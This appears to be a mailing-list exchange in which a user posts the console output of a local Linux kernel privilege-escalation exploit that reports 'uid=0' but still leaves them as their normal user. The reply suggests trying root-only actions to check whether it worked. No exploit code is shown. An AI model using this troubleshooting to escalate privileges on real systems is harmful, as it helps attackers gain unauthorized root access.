A.J. Loonstra wrote:
I tried modifying the exploit not to use /dev/shm... but this is wat happens: ~$ ./a.out [+] SLAB cleanup child 1 VMAs 287 [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000 [+] vmalloc area 0xc5000000 - 0xc9d17000 Wait... | [+] race won maps=6768 expanded VMA (0xbfffc000-0xffffe000) [!] try to exploit 0xc594b000 [+] gate modified ( 0xffec94bf 0x0804ec00 ) [+] exploited, uid=0 sh-2.05a$ whoami arnaud sh-2.05a$ mount /dev/hda1 on / type ext2 (rw,errors=remount-ro) proc on /proc type proc (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/hda2 on /home type ext3 (rw) $sh-2.05a$ echo $UID 0 It says it did exploit but it didn't... A.
Try doing something that would require root (eg.. mount something, create a file in /, etc)
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature